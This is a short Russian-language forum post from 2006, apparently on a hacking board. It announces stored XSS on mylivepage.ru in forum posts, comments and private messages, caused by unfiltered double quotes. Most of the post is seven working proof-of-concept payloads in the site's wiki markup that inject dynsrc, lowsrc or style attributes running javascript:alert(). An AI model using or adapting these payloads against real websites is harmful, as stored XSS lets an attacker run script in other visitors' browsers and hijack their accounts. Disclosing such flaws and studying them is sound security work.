19.11.2006, 22:08
|
|
Познающий
Регистрация: 07.11.2006
Сообщений: 30
Провел на форуме:
128714
Репутация:
40
|
|
mylivepage.ru активные XSS
mylivepage.ru/
активные XSS в форуме, комментариях, личных сообщениях и везде где можно
оставить своё сообщение.
Нет фильтрации `"` применив дополнительные динамические
параметры тэга img експлуатируем XSS:
[[Smile:"dynsrc="javascript:alert()]]
[[Smile:"lowsrc="javascript:alert()]]
[[Smile:"style="javascript:alert()]]
[[Image:"lowsrc="javascript:alert()]]
[[Image:"style="javascript:alert()]]
[[Image:"dynsrc="javascript:alert()]]
[[http://qwe.ru"style="background:url(javascript:alert())]]
|
|
|